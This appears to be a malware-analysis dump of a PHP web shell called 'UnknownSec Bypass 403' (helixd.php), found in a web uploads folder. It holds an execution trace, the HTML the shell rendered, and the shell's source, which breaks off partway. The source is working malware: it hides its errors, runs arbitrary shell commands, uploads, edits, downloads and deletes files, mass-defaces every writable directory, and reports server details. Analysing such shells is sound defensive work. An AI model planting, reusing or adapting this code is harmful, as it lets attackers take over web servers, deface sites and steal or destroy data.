2 24 1 0.001813 523072
2 24 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/helixd.php 213 $scdir = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
1 A /var/www/html/uploads/helixd.php 214 $i = 0
1 A /var/www/html/uploads/helixd.php 214 $i++
2 25 0 0.001871 523000 scandir 0 /var/www/html/uploads/helixd.php 628 1 '/var/www/html/uploads'
2 25 1 0.001902 523624
2 25 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'helixd.php', 5 => 'prepend.php']
1 A /var/www/html/uploads/helixd.php 628 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'helixd.php', 5 => 'prepend.php']
2 26 0 0.001939 523592 getcwd 0 /var/www/html/uploads/helixd.php 629 0
2 26 1 0.001951 523640
2 26 R '/var/www/html/uploads'
1 A /var/www/html/uploads/helixd.php 629 $pa = '/var/www/html/uploads'
2 27 0 0.001977 523640 filemtime 0 /var/www/html/uploads/helixd.php 643 1 '/var/www/html/uploads/.'
2 27 1 0.001992 523680
2 27 R 1676246984
2 28 0 0.002005 523592 date 0 /var/www/html/uploads/helixd.php 643 2 'Y-m-d' 1676246984
2 28 1 0.002060 525984
2 28 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 643 $dt = '2023-02-12'
2 29 0 0.002088 525960 is_dir 0 /var/www/html/uploads/helixd.php 644 1 '/var/www/html/uploads/.'
2 29 1 0.002102 526000
2 29 R TRUE
2 30 0 0.002115 525968 filemtime 0 /var/www/html/uploads/helixd.php 643 1 '/var/www/html/uploads/..'
2 30 1 0.002131 526016
2 30 R 1676246984
2 31 0 0.002144 525920 date 0 /var/www/html/uploads/helixd.php 643 2 'Y-m-d' 1676246984
2 31 1 0.002174 526248
2 31 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 643 $dt = '2023-02-12'
2 32 0 0.002197 525976 is_dir 0 /var/www/html/uploads/helixd.php 644 1 '/var/www/html/uploads/..'
2 32 1 0.002211 526016
2 32 R TRUE
2 33 0 0.002224 525976 filemtime 0 /var/www/html/uploads/helixd.php 643 1 '/var/www/html/uploads/.htaccess'
2 33 1 0.002238 526016
2 33 R 1676246984
2 34 0 0.002251 525920 date 0 /var/www/html/uploads/helixd.php 643 2 'Y-m-d' 1676246984
2 34 1 0.002281 526248
2 34 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 643 $dt = '2023-02-12'
2 35 0 0.002304 525976 is_dir 0 /var/www/html/uploads/helixd.php 644 1 '/var/www/html/uploads/.htaccess'
2 35 1 0.002317 526016
2 35 R FALSE
2 36 0 0.002330 525976 filemtime 0 /var/www/html/uploads/helixd.php 643 1 '/var/www/html/uploads/data'
2 36 1 0.002345 526016
2 36 R 1676246984
2 37 0 0.002364 525920 date 0 /var/www/html/uploads/helixd.php 643 2 'Y-m-d' 1676246984
2 37 1 0.002394 526248
2 37 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 643 $dt = '2023-02-12'
2 38 0 0.002417 525976 is_dir 0 /var/www/html/uploads/helixd.php 644 1 '/var/www/html/uploads/data'
2 38 1 0.002430 526016
2 38 R TRUE
2 39 0 0.002444 525976 is_writable 0 /var/www/html/uploads/helixd.php 651 1 '/var/www/html/uploads/data'
2 39 1 0.002460 526016
2 39 R TRUE
2 40 0 0.002473 525976 p 1 /var/www/html/uploads/helixd.php 653 1 '/var/www/html/uploads/data'
3 41 0 0.002485 525976 fileperms 0 /var/www/html/uploads/helixd.php 118 1 '/var/www/html/uploads/data'
3 41 1 0.002498 526016
3 41 R 16895
2 A /var/www/html/uploads/helixd.php 118 $p = 16895
2 A /var/www/html/uploads/helixd.php 128 $i = 'd'
2 A /var/www/html/uploads/helixd.php 136 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 137 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 140 $i .= 'x'
2 A /var/www/html/uploads/helixd.php 141 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 142 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 145 $i .= 'x'
2 A /var/www/html/uploads/helixd.php 146 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 147 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 150 $i .= 'x'
2 40 1 0.002662 526016
2 40 R 'drwxrwxrwx'
2 42 0 0.002677 525976 is_writable 0 /var/www/html/uploads/helixd.php 654 1 '/var/www/html/uploads/data'
2 42 1 0.002693 526016
2 42 R TRUE
2 43 0 0.002708 525984 filemtime 0 /var/www/html/uploads/helixd.php 643 1 '/var/www/html/uploads/helixd.php'
2 43 1 0.002723 526032
2 43 R 1676246984
2 44 0 0.002736 525928 date 0 /var/www/html/uploads/helixd.php 643 2 'Y-m-d' 1676246984
2 44 1 0.002766 526256
2 44 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 643 $dt = '2023-02-12'
2 45 0 0.002790 525992 is_dir 0 /var/www/html/uploads/helixd.php 644 1 '/var/www/html/uploads/helixd.php'
2 45 1 0.002803 526032
2 45 R FALSE
2 46 0 0.002817 525992 filemtime 0 /var/www/html/uploads/helixd.php 643 1 '/var/www/html/uploads/prepend.php'
2 46 1 0.002832 526032
2 46 R 1676246984
2 47 0 0.002845 525928 date 0 /var/www/html/uploads/helixd.php 643 2 'Y-m-d' 1676246984
2 47 1 0.002875 526256
2 47 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 643 $dt = '2023-02-12'
2 48 0 0.002899 525992 is_dir 0 /var/www/html/uploads/helixd.php 644 1 '/var/www/html/uploads/prepend.php'
2 48 1 0.002912 526032
2 48 R FALSE
2 49 0 0.002925 525976 filemtime 0 /var/www/html/uploads/helixd.php 675 1 '/var/www/html/uploads/.'
2 49 1 0.002940 526000
2 49 R 1676246984
2 50 0 0.002953 525912 date 0 /var/www/html/uploads/helixd.php 675 2 'Y-m-d' 1676246984
2 50 1 0.002982 526240
2 50 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 675 $ft = '2023-02-12'
2 51 0 0.003007 526216 is_file 0 /var/www/html/uploads/helixd.php 676 1 '/var/www/html/uploads/.'
2 51 1 0.003019 526256
2 51 R FALSE
2 52 0 0.003033 526224 filemtime 0 /var/www/html/uploads/helixd.php 675 1 '/var/www/html/uploads/..'
2 52 1 0.003047 526272
2 52 R 1676246984
2 53 0 0.003061 526176 date 0 /var/www/html/uploads/helixd.php 675 2 'Y-m-d' 1676246984
2 53 1 0.003090 526504
2 53 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 675 $ft = '2023-02-12'
2 54 0 0.003114 526232 is_file 0 /var/www/html/uploads/helixd.php 676 1 '/var/www/html/uploads/..'
2 54 1 0.003127 526272
2 54 R FALSE
2 55 0 0.003140 526232 filemtime 0 /var/www/html/uploads/helixd.php 675 1 '/var/www/html/uploads/.htaccess'
2 55 1 0.003155 526272
2 55 R 1676246984
2 56 0 0.003168 526176 date 0 /var/www/html/uploads/helixd.php 675 2 'Y-m-d' 1676246984
2 56 1 0.003197 526504
2 56 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 675 $ft = '2023-02-12'
2 57 0 0.003221 526232 is_file 0 /var/www/html/uploads/helixd.php 676 1 '/var/www/html/uploads/.htaccess'
2 57 1 0.003233 526272
2 57 R TRUE
2 58 0 0.003247 526232 filesize 0 /var/www/html/uploads/helixd.php 677 1 '/var/www/html/uploads/.htaccess'
2 58 1 0.003259 526272
2 58 R 64
1 A /var/www/html/uploads/helixd.php 677 $s = 0.0625
2 59 0 0.003288 526176 round 0 /var/www/html/uploads/helixd.php 678 2 0.0625 3
2 59 1 0.003302 526248
2 59 R 0.063
1 A /var/www/html/uploads/helixd.php 678 $s = 0.063
1 A /var/www/html/uploads/helixd.php 682 $s = '0.063 KB'
2 60 0 0.003338 526272 is_writable 0 /var/www/html/uploads/helixd.php 690 1 '/var/www/html/uploads/.htaccess'
2 60 1 0.003355 526312
2 60 R FALSE
2 61 0 0.003368 526272 is_readable 0 /var/www/html/uploads/helixd.php 691 1 '/var/www/html/uploads/.htaccess'
2 61 1 0.003382 526312
2 61 R TRUE
2 62 0 0.003396 526272 p 1 /var/www/html/uploads/helixd.php 692 1 '/var/www/html/uploads/.htaccess'
3 63 0 0.003408 526272 fileperms 0 /var/www/html/uploads/helixd.php 118 1 '/var/www/html/uploads/.htaccess'
3 63 1 0.003421 526312
3 63 R 33188
2 A /var/www/html/uploads/helixd.php 118 $p = 33188
2 A /var/www/html/uploads/helixd.php 124 $i = '-'
2 A /var/www/html/uploads/helixd.php 136 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 137 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 140 $i .= '-'
2 A /var/www/html/uploads/helixd.php 141 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 142 $i .= '-'
2 A /var/www/html/uploads/helixd.php 145 $i .= '-'
2 A /var/www/html/uploads/helixd.php 146 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 147 $i .= '-'
2 A /var/www/html/uploads/helixd.php 150 $i .= '-'
2 62 1 0.003538 526312
2 62 R '-rw-r--r--'
2 64 0 0.003552 526272 is_writable 0 /var/www/html/uploads/helixd.php 693 1 '/var/www/html/uploads/.htaccess'
2 64 1 0.003567 526312
2 64 R FALSE
2 65 0 0.003580 526272 is_readable 0 /var/www/html/uploads/helixd.php 693 1 '/var/www/html/uploads/.htaccess'
2 65 1 0.003595 526312
2 65 R TRUE
2 66 0 0.003613 526384 filemtime 0 /var/www/html/uploads/helixd.php 675 1 '/var/www/html/uploads/data'
2 66 1 0.003628 526424
2 66 R 1676246984
2 67 0 0.003641 526328 date 0 /var/www/html/uploads/helixd.php 675 2 'Y-m-d' 1676246984
2 67 1 0.003671 526656
2 67 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 675 $ft = '2023-02-12'
2 68 0 0.003696 526384 is_file 0 /var/www/html/uploads/helixd.php 676 1 '/var/www/html/uploads/data'
2 68 1 0.003708 526424
2 68 R FALSE
2 69 0 0.003722 526392 filemtime 0 /var/www/html/uploads/helixd.php 675 1 '/var/www/html/uploads/helixd.php'
2 69 1 0.003736 526440
2 69 R 1676246984
2 70 0 0.003749 526336 date 0 /var/www/html/uploads/helixd.php 675 2 'Y-m-d' 1676246984
2 70 1 0.003778 526664
2 70 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 675 $ft = '2023-02-12'
2 71 0 0.003803 526400 is_file 0 /var/www/html/uploads/helixd.php 676 1 '/var/www/html/uploads/helixd.php'
2 71 1 0.003816 526440
2 71 R TRUE
2 72 0 0.003829 526400 filesize 0 /var/www/html/uploads/helixd.php 677 1 '/var/www/html/uploads/helixd.php'
2 72 1 0.003841 526440
2 72 R 21710
1 A /var/www/html/uploads/helixd.php 677 $s = 21.201171875
2 73 0 0.003865 526296 round 0 /var/www/html/uploads/helixd.php 678 2 21.201171875 3
2 73 1 0.003888 526368
2 73 R 21.201
1 A /var/www/html/uploads/helixd.php 678 $s = 21.201
1 A /var/www/html/uploads/helixd.php 682 $s = '21.201 KB'
2 74 0 0.003924 526400 is_writable 0 /var/www/html/uploads/helixd.php 690 1 '/var/www/html/uploads/helixd.php'
2 74 1 0.003940 526440
2 74 R FALSE
2 75 0 0.003953 526400 is_readable 0 /var/www/html/uploads/helixd.php 691 1 '/var/www/html/uploads/helixd.php'
2 75 1 0.003968 526440
2 75 R TRUE
2 76 0 0.003981 526400 p 1 /var/www/html/uploads/helixd.php 692 1 '/var/www/html/uploads/helixd.php'
3 77 0 0.003993 526400 fileperms 0 /var/www/html/uploads/helixd.php 118 1 '/var/www/html/uploads/helixd.php'
3 77 1 0.004005 526440
3 77 R 33204
2 A /var/www/html/uploads/helixd.php 118 $p = 33204
2 A /var/www/html/uploads/helixd.php 124 $i = '-'
2 A /var/www/html/uploads/helixd.php 136 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 137 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 140 $i .= '-'
2 A /var/www/html/uploads/helixd.php 141 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 142 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 145 $i .= '-'
2 A /var/www/html/uploads/helixd.php 146 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 147 $i .= '-'
2 A /var/www/html/uploads/helixd.php 150 $i .= '-'
2 76 1 0.004126 526440
2 76 R '-rw-rw-r--'
2 78 0 0.004140 526400 is_writable 0 /var/www/html/uploads/helixd.php 693 1 '/var/www/html/uploads/helixd.php'
2 78 1 0.004156 526440
2 78 R FALSE
2 79 0 0.004169 526400 is_readable 0 /var/www/html/uploads/helixd.php 693 1 '/var/www/html/uploads/helixd.php'
2 79 1 0.004183 526440
2 79 R TRUE
2 80 0 0.004197 526400 filemtime 0 /var/www/html/uploads/helixd.php 675 1 '/var/www/html/uploads/prepend.php'
2 80 1 0.004213 526440
2 80 R 1676246984
2 81 0 0.004226 526336 date 0 /var/www/html/uploads/helixd.php 675 2 'Y-m-d' 1676246984
2 81 1 0.004256 526664
2 81 R '2023-02-12'
1 A /var/www/html/uploads/helixd.php 675 $ft = '2023-02-12'
2 82 0 0.004280 526400 is_file 0 /var/www/html/uploads/helixd.php 676 1 '/var/www/html/uploads/prepend.php'
2 82 1 0.004294 526440
2 82 R TRUE
2 83 0 0.004306 526400 filesize 0 /var/www/html/uploads/helixd.php 677 1 '/var/www/html/uploads/prepend.php'
2 83 1 0.004320 526440
2 83 R 57
1 A /var/www/html/uploads/helixd.php 677 $s = 0.0556640625
2 84 0 0.004343 526296 round 0 /var/www/html/uploads/helixd.php 678 2 0.0556640625 3
2 84 1 0.004356 526368
2 84 R 0.056
1 A /var/www/html/uploads/helixd.php 678 $s = 0.056
1 A /var/www/html/uploads/helixd.php 682 $s = '0.056 KB'
2 85 0 0.004391 526400 is_writable 0 /var/www/html/uploads/helixd.php 690 1 '/var/www/html/uploads/prepend.php'
2 85 1 0.004406 526440
2 85 R FALSE
2 86 0 0.004420 526400 is_readable 0 /var/www/html/uploads/helixd.php 691 1 '/var/www/html/uploads/prepend.php'
2 86 1 0.004435 526440
2 86 R TRUE
2 87 0 0.004448 526400 p 1 /var/www/html/uploads/helixd.php 692 1 '/var/www/html/uploads/prepend.php'
3 88 0 0.004461 526400 fileperms 0 /var/www/html/uploads/helixd.php 118 1 '/var/www/html/uploads/prepend.php'
3 88 1 0.004474 526440
3 88 R 33261
2 A /var/www/html/uploads/helixd.php 118 $p = 33261
2 A /var/www/html/uploads/helixd.php 124 $i = '-'
2 A /var/www/html/uploads/helixd.php 136 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 137 $i .= 'w'
2 A /var/www/html/uploads/helixd.php 140 $i .= 'x'
2 A /var/www/html/uploads/helixd.php 141 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 142 $i .= '-'
2 A /var/www/html/uploads/helixd.php 145 $i .= 'x'
2 A /var/www/html/uploads/helixd.php 146 $i .= 'r'
2 A /var/www/html/uploads/helixd.php 147 $i .= '-'
2 A /var/www/html/uploads/helixd.php 150 $i .= 'x'
2 87 1 0.004591 526440
2 87 R '-rwxr-xr-x'
2 89 0 0.004605 526400 is_writable 0 /var/www/html/uploads/helixd.php 693 1 '/var/www/html/uploads/prepend.php'
2 89 1 0.004621 526440
2 89 R FALSE
2 90 0 0.004634 526400 is_readable 0 /var/www/html/uploads/helixd.php 693 1 '/var/www/html/uploads/prepend.php'
2 90 1 0.004649 526440
2 90 R TRUE
2 91 0 0.004663 526336 date 0 /var/www/html/uploads/helixd.php 720 1 'Y'
2 91 1 0.004692 526624
2 91 R '2023'
1 3 1 0.004707 526336
0.004742 362632
TRACE END [2023-02-12 22:10:10.333882]
Generated HTML code
<html><head>
<meta name="author" content="UnknownSec">
<meta name="robots" content="NOINDEX, NOFOLLOW">
<title>localhost - UnknownSec 403</title>
<meta name="viewport" content="width=device-width, initial-scale=0.70, user-scalable=no">
<link rel="stylesheet" href="//unknownsec.ftp.sh/main/style.css">
<script src="//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js"></script>
</head>
<body class="bg-secondary text-light">
<div class="container-fluid">
<div class="py-3" id="main">
<div class="box shadow bg-dark p-4 rounded-3">
<a class="text-decoration-none text-light" href="/helixd.php"><h4>UnknownSec Bypass <i class="bi bi-bug-fill"></i> 403</h4></a><i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a><a class="text-decoration-none" href="?path=/var">var</a>/<a class="text-decoration-none" href="?path=/var/www">www</a>/<a class="text-decoration-none" href="?path=/var/www/html">html</a>/ [ <font color="green">drwxrwxrwx</font> ]
<div class="dropdown">
<button class="btn btn-outline-light dropdown-toggle btn-sm" type="button" id="dropdownMenuButton" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="bi bi-menu-down"></i> Menu</button>
<div class="dropdown-menu">
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=upload"><i class="bi bi-upload"></i> Upload</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=depes"><i class="bi bi-exclamation-diamond"></i> Mass depes</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=delete"><i class="bi bi-trash"></i> Mass delete</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=cmd"><i class="bi bi-terminal"></i> Terminal</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=info"><i class="bi bi-info-circle"></i> Info server</a>
<a class="dropdown-item" href="?path=/var/www/html&dir=/var/www/html&id=about"><i class="bi bi-info"></i> About</a>
</div>
</div><div class="table-responsive">
<table class="table table-hover table-dark text-light">
<thead>
<tr>
<td class="text-center">Name</td>
<td class="text-center">Last edit</td>
<td class="text-center">Size</td>
<td class="text-center">Permission</td>
<td class="text-center">Options</td>
</tr>
</thead>
<tbody class="text-nowrap">
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>2023-02-12</center></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-select form-select-sm" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="beneri.se_malware_analysis">
<input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis">
<input class="btn btn-outline-light btn-sm" type="submit" value="Go">
</div></form>
</td>
</tr>
<tr>
<td><i class="bi bi-file-earmark-code-fill"></i><a class="text-decoration-none text-secondary" href="?filesrc=/var/www/html/helixd.php&path=/var/www/html">helixd.php</a></td>
<td><center>2023-02-12</center></td>
<td><center>21.201 KB</center></td>
<td><center>-rw-rw-r--</center></td>
<td>
<form method="POST" action="?option&path=/var/www/html">
<div class="input-group mb-3 text-center">
<select class="form-select form-select-sm" name="opt">
<option selected="" disabled="">Select</option>
<option value="delete">Delete</option>
<option value="edit">Edit</option>
<option value="rename">Rename</option>
<option value="chmod">Chmod</option>
<option value="download">Download</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="helixd.php">
<input type="hidden" name="path" value="/var/www/html/helixd.php">
<input class="btn btn-outline-light btn-sm" type="submit" value="Go">
</div></form>
</td>
</tr>
</tbody>
</table>
<div class="text-center">
<kbd>Copyright © 2023 - UnknownSec</kbd>
</div>
</div>
</div>
</div>
</div>
<script src="//code.jquery.com/jquery-3.3.1.slim.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"></script>
<script src="//stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"></script>
</body></html>Original PHP code
<?php
/* ~ Mau recode? izin dulu, recode ga izin itu ga keren ajg
~ V.02
~ Thanks to all mem AnonSec Team and all friend.
~ Untuk beberapa tools gw ambil dari indoxploit, karena tidak semuanya gw otakin sendiri.
*/
set_time_limit(0);
error_reporting(0);
@ini_set('error_log',null);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$▛ = 'UnknownSec';
$▘ = "<style>table{display:none;}</style>";
if(isset($_GET['option']) && $_POST['opt'] == 'download'){
header('Content-type: text/plain');
header('Content-Disposition: attachment; filename="'.$_POST['name'].'"');
echo(file_get_contents($_POST['path']));
exit();
}
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
function ▟($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function dc($dir,$p) {
if (isset($_GET['path'])) {
$▚ = $_GET['path'];
} else {
$▚ = getcwd();
}
if (is_writable($▚)) {
return "<font color='green'>".$p."</font>";
} else {
return "<font color='red'>".$p."</font>";
}
}
function ip() {
$ipas = '';
if (getenv('HTTP_CLIENT_IP'))
$ipas = getenv('HTTP_CLIENT_IP');
else if(getenv('HTTP_X_FORWARDED_FOR'))
$ipas = getenv('HTTP_X_FORWARDED_FOR');
else if(getenv('HTTP_X_FORWARDED'))
$ipas = getenv('HTTP_X_FORWARDED');
else if(getenv('HTTP_FORWARDED_FOR'))
$ipas = getenv('HTTP_FORWARDED_FOR');
else if(getenv('HTTP_FORWARDED'))
$ipas = getenv('HTTP_FORWARDED');
else if(getenv('REMOTE_ADDR'))
$ipas = getenv('REMOTE_ADDR');
else
$ipas = 'IP tidak dikenali';
return $ipas;
}
function ekse() {
$cmd = "whoami";
$return = "";
$output = "";
$methodArray = array();
//exec()
$return = ""; $output = "";
exec($cmd, $output, $return);
if (strlen($output[0]) > 0 && $return == 0) {
$methodArray[] = "exec";
}
//shell_exec()
$return = ""; $output = "";
$output = shell_exec($cmd);
if (strlen($output) > 0) {
$methodArray[] = "shell_exec";
}
return $methodArray;
}
function ekseCMD($cmd, $method) {
if ($method == "") {
ob_start();
$methodArray = ekse();
ob_end_clean();
if (is_array($methodArray)) {
$method = $methodArray[0];
}
}
switch ($method) {
case "exec":
exec($cmd, $output);
var_dump($output);
break;
case "shell_exec":
echo shell_exec($cmd);
break;
}
}
$cmd = htmlspecialchars($_POST["cmd"]);
$method = htmlspecialchars($_POST["execCMD"]);
function p($file){
$p = fileperms($file);
if (($p & 0xC000) == 0xC000) {
$i = 's';
} elseif (($p & 0xA000) == 0xA000) {
$i = 'l';
} elseif (($p & 0x8000) == 0x8000) {
$i = '-';
} elseif (($p & 0x6000) == 0x6000) {
$i = 'b';
} elseif (($p & 0x4000) == 0x4000) {
$i = 'd';
} elseif (($p & 0x2000) == 0x2000) {
$i = 'c';
} elseif (($p & 0x1000) == 0x1000) {
$i = 'p';
} else {
$i = 'u';
}
$i .= (($p & 0x0100) ? 'r' : '-');
$i .= (($p & 0x0080) ? 'w' : '-');
$i .= (($p & 0x0040) ?
(($p & 0x0800) ? 's' : 'x' ) :
(($p & 0x0800) ? 'S' : '-'));
$i .= (($p & 0x0020) ? 'r' : '-');
$i .= (($p & 0x0010) ? 'w' : '-');
$i .= (($p & 0x0008) ?
(($p & 0x0400) ? 's' : 'x' ) :
(($p & 0x0400) ? 'S' : '-'));
$i .= (($p & 0x0004) ? 'r' : '-');
$i .= (($p & 0x0002) ? 'w' : '-');
$i .= (($p & 0x0001) ?
(($p & 0x0200) ? 't' : 'x' ) :
(($p & 0x0200) ? 'T' : '-'));
return $i;
exit();
}
echo "
<!DOCTYPE HTML>
<html>
<head>
<meta name='author' content='$▛'>
<meta name='robots' content='NOINDEX, NOFOLLOW'>
<title>".$_SERVER['HTTP_HOST']." - $▛ 403</title>
<meta name='viewport' content='width=device-width, initial-scale=0.70, user-scalable=no'>
<link rel='stylesheet' href='//unknownsec.ftp.sh/main/style.css'>
<script src='//maxcdn.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js'></script>
<script src='//cdnjs.cloudflare.com/ajax/libs/limonte-sweetalert2/7.33.1/sweetalert2.min.js'></script>
</head>
<body class='bg-secondary text-light'>
<div class='container-fluid'>
<div class='py-3' id='main'>
<div class='box shadow bg-dark p-4 rounded-3'>
<a class='text-decoration-none text-light' href='".$_SERVER['PHP_SELF']."'><h4>$▛ Bypass <i class='bi bi-bug-fill'></i> 403</h4></a>";
if(isset($_GET['path'])){
$path = $_GET['path'];
}else{
$path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);
foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo '<i class="bi bi-hdd-rack"></i> : <a class="text-decoration-none text-light" href="?path=/">/</a>';
continue;
}
if($pat == '') continue;
echo '<a class="text-decoration-none" href="?path=';
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo "/";
}
echo '">'.$pat.'</a>/';
}
echo " [ ".▟($path, p($path))." ]";
echo "
<div class='dropdown'>
<button class='btn btn-outline-light dropdown-toggle btn-sm' type='button' id='dropdownMenuButton' data-toggle='dropdown' aria-haspopup='true' aria-expanded='false'><i class='bi bi-menu-down'></i> Menu</button>
<div class='dropdown-menu'>
<a class='dropdown-item' href='?path=$path&dir=$path&id=upload'><i class='bi bi-upload'></i> Upload</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=depes'><i class='bi bi-exclamation-diamond'></i> Mass depes</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=delete'><i class='bi bi-trash'></i> Mass delete</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=cmd'><i class='bi bi-terminal'></i> Terminal</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=info'><i class='bi bi-info-circle'></i> Info server</a>
<a class='dropdown-item' href='?path=$path&dir=$path&id=about'><i class='bi bi-info'></i> About</a></h5>
</div>
</div>";
// tools nya
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($dir);
} else {
$dir = getcwd();
}
$dir = str_replace("\\","/",$dir);
$scdir = explode("/", $dir);
for($i = 0; $i <= $c_dir; $i++) {
$scdir[$i];
if($i != $c_dir) {
}
elseif($_GET['id'] == 'depes'){
function mass_kabeh($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=green>success</font>] $▚<br>";
file_put_contents($▚, $isi_script);
$▟ = mass_kabeh($dirc,$namafile,$isi_script);
}
}
}
}
}
}
function mass_biasa($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$▚ = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($▚, $isi_script);
} elseif($dirb === '..') {
file_put_contents($▚, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=green>success</font>] $dirb/$namafile<br>";
file_put_contents($▚, $isi_script);
}
}
}
}
}
}
if($_POST['start']) {
if($_POST['tipe'] == 'massal') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_kabeh($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} elseif($_POST['tipe'] == 'biasa') {
echo "<div style='margin: 5px auto; padding: 5px'>";
mass_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
}
} else {
echo "<br />$▘
<form method='post'>
<b>Tipe:</b><br>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch' class='custom-control-input' name='tipe' value='biasa'>
<label class='custom-control-label' for='customSwitch'>Biasa</label>
</div>
<div class='custom-control custom-switch'>
<input type='checkbox' id='customSwitch1' class='custom-control-input' name='tipe' value='massal'>
<label class='custom-control-label' for='customSwitch1'>Massal</label>
</div>
<b><i class='bi bi-folder'></i> Lokasi:</b>
<input class='form-control' type='text' name='d_dir' value='$dir' height='10'>
<b><i class='bi bi-file-earmark'></i> File name:</b>
<input class='form-control' type='text' name='d_file' placeholder='name file' height='10'>
<b><i class='bi bi-file-earmark'></i> Your script:</b>
<textarea class='form-control' rows='7' name='script' placeholder='your secript here'></textarea><br />
<input type='submit' name='start' value='Go' class='btn btn-outline-light'>
</form>";
}
}
elseif($_GET['id'] == 'info'){
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
$disfc = "<font color=green>NONE</font>";
} else {
$disfc = "<font color=red>$disfunc</font>";
}
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=green>OFF</font>";
echo '<br />'.$▘.'
<div class="container">
<div class="card text-dark">
<div class="card-header">';
echo "<b>Uname: </b><font color=green>".php_uname()."</font><br />";
